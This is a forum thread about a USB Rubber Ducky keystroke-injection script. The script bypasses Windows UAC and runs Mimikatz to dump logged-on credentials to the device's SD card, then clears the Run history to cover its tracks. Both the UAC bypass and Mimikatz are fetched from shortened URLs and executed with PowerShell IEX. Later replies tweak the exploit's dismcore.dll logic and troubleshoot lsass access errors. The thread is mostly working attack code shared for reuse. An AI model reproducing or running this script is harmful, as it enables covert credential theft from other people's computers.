Jump to content

mimikatz output to SD card, with new UAC exploit, NO UAC popup to deal with


linuxbman
 Share

Recommended Posts

Hi all,

I've been playing with the ducky for some time, figured it was time to give back to the community.  I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer.  

The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present.  I suspect it is because the exploit pops the new window up, and likely there is nothing I can do.  Hopefully someone can figure it out.

Otherwise it works pretty nice.  Feel free to clean it up and make it better.

REM open cmd and set drive letter
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1
ENTER
DELAY 1000

STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm');  Bypass-UAC -Method ucmDismMethod; exit;"
ENTER
DELAY 1000

REM Shrink windows
STRING mode CON: COLS=15 LINES=1
ENTER

REM get Ducky Drive letter
STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}
ENTER
DELAY 500

REM Run Mimikatz and dump to ducky in file named after computer
STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt");
ENTER
DELAY 1000
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit
ENTER

 

Link to comment
Share on other sites

Question:

I'm also getting the 'replace files' dialog after the second application of this payload. I'm attempting to get rid of that 'replace files' dialog by modifying the ps1 script and putting the modified version on my web server.

Since I didn't check prior to using the hack on my personal computer, the question I have is, does 'dismcore.dll' exist prior to applying this hack? Or does this hack create/spawn 'dismcore.dll' as a new dll for the system? The reason being, how I'm modifying the ps1 is that it assumes there is no dismcore.dll before the hack is applied.

Link to comment
Share on other sites

            # Exploit logic
			if (Test-Path  $($env:SystemRoot + '\System32\dismcore.dll'))
			{
				echo "[!] Already Have dismcore.dll, not moving file."
			} else {
				echo "[>] Performing elevated IFileOperation::MoveItem operation.."

				$IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\System32\'), "dismcore.dll")
				$IFileOperation.PerformOperations()
			}

At about line 1383 I just modded the ps1 at https://goo.gl/fPl4tm to whats in the code bock

Link to comment
Share on other sites

nobody get this error on the txt file ?

 

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

 

What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Quote

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).

So, do not hesitate to start with:


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK

...before others commands

 

 

Link to comment
Share on other sites

On 9/26/2016 at 6:03 AM, MrMoi said:

nobody get this error on the txt file ?

 

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

 

What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

I got it as well, I tried throwing those 2 commands first thing after the comments in mimikatz, It ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution

 

*Windows 10 x64 - 1607

Link to comment
Share on other sites

1 hour ago, th3count said:

I got it as well, I tried throwing those 2 commands first thing after the comments in mimikatz, It ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution

 

*Windows 10 x64 - 1607

 

I got it to run executing the new version manually in command line. the version on the google link is 2.0 new version is 2.1 maybe this?

Link to comment
Share on other sites

  • 2 weeks later...
  • 10 months later...
On 9/26/2016 at 8:03 AM, MrMoi said:

nobody get this error on the txt file ?

 

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

 

What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

 

 

 

On 9/27/2016 at 11:08 PM, th3count said:

I got it as well, I tried throwing those 2 commands first thing after the comments in mimikatz, It ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution

 

*Windows 10 x64 - 1607

 

On 9/28/2016 at 0:57 AM, th3count said:

 

I got it to run executing the new version manually in command line. the version on the google link is 2.0 new version is 2.1 maybe this?

 

When I was working with this, I found it SEEMS to be an issue with WIndows 10, I got it to work on Win7 with no issues but when I tried it on 5-6 various Win10 machines, I always get that output, been looking for a fix for that.

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...